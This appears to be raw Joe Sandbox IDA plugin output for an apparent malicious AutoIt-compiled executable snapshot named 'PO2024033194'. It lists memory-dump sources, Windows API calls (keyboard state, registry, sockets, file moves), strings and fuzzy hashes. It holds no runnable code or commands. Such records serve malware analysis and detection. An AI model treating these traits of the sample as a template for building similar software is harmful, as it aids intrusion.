                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                  • String ID: 0$2
                                                                  • API String ID: 93392585-3793063076
                                                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                  APIs
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                  • String ID: crts
                                                                  • API String ID: 586820018-3724388283
                                                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                  APIs
                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                  • _wcscat.LIBCMT ref: 0044BCAF
                                                                  • _wcslen.LIBCMT ref: 0044BCBB
                                                                  • _wcslen.LIBCMT ref: 0044BCD1
                                                                  • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 2326526234-1173974218
                                                                  • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                  • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                  • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                  • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                  APIs
                                                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                  • _wcslen.LIBCMT ref: 004335F2
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                  • GetLastError.KERNEL32 ref: 0043362B
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                  • _wcsrchr.LIBCMT ref: 00433666
                                                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                  • String ID: \
                                                                  • API String ID: 321622961-2967466578
                                                                  • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                  • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                  • API String ID: 1038674560-2734436370
                                                                  • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                  • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                  • LoadStringW.USER32(00000000), ref: 00434060
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                  • LoadStringW.USER32(00000000), ref: 00434078
                                                                  • _wprintf.LIBCMT ref: 004340A1
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                  • __lock.LIBCMT ref: 00417981
                                                                    • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                    • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                    • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                  • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                  • __lock.LIBCMT ref: 004179A2
                                                                  • ___addlocaleref.LIBCMT ref: 004179C0
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                  • String ID: KERNEL32.DLL$pI
                                                                  • API String ID: 637971194-197072765
                                                                  • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                  • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                  • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                  • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _memmove$_malloc
                                                                  • String ID:
                                                                  • API String ID: 1938898002-0
                                                                  • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                  • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                  • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                  • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                  • _memmove.LIBCMT ref: 0044B555
                                                                  • _memmove.LIBCMT ref: 0044B578
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                  • String ID:
                                                                  • API String ID: 2737351978-0
                                                                  • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                  • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                  • __calloc_crt.LIBCMT ref: 00415246
                                                                  • __getptd.LIBCMT ref: 00415253
                                                                  • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                  • _free.LIBCMT ref: 0041529E
                                                                  • __dosmaperr.LIBCMT ref: 004152A9
                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Similarity
                                                                  • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 3638380555-0
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Variant$Copy$ClearErrorInitLast
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                  • API String ID: 3207048006-625585964
                                                                  APIs
                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                  • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                  • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                  • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                  • _memmove.LIBCMT ref: 004656CA
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                  • WSACleanup.WSOCK32 ref: 00465762
                                                                  Similarity
                                                                  • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                  • String ID:
                                                                  • API String ID: 2945290962-0
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                  • String ID:
                                                                  • API String ID: 1457242333-0
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                  Similarity
                                                                  • API ID: ConnectRegistry_memmove_wcslen
                                                                  • String ID:
                                                                  • API String ID: 15295421-0
                                                                  APIs
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • _wcstok.LIBCMT ref: 004675B2
                                                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                  • _wcscpy.LIBCMT ref: 00467641
                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                  • _wcslen.LIBCMT ref: 00467793
                                                                  • _wcslen.LIBCMT ref: 004677BD
                                                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                  • String ID: X
                                                                  • API String ID: 780548581-3081909835
                                                                  APIs
                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                  • CloseFigure.GDI32(?), ref: 0044751F
                                                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                  Similarity
                                                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                  • String ID:
                                                                  • API String ID: 4082120231-0
                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                  • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                  Similarity
                                                                  • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2027346449-0
                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                  • GetMenu.USER32 ref: 0047A703
                                                                  • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                  • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                  • _wcslen.LIBCMT ref: 0047A79E
                                                                  • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                  • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                  • String ID:
                                                                  • API String ID: 3257027151-0
                                                                  • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                  • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                  • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                  • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                  APIs
                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastselect
                                                                  • String ID:
                                                                  • API String ID: 215497628-0
                                                                  • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                  • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                  • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                  • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0044443B
                                                                  • GetKeyboardState.USER32(?), ref: 00444450
                                                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00444633
                                                                  • GetKeyboardState.USER32(?), ref: 00444648
                                                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                  • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                  • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                  • String ID:
                                                                  • API String ID: 2354583917-0
                                                                  • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                  • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                  • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                  • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
